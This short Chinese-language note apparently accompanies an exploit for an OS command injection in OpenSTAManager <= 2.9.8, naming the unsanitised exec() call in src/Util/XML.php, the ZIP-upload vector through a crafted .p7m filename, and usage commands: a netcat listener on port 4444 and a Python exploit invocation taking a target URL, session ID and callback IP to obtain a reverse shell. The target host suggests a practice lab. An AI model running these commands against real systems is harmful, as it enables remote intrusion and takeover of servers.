OpenSTAManager <= 2.9.8 — 通过 ZIP 上传中的恶意 .p7m 文件名实现操作系统命令注入
文件: src/Util/XML.php:100 — 未净化的 $file 位于 exec() 中
向量: /plugins/importFE_ZIP/actions.php → ZIP → .p7m 文件名 → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444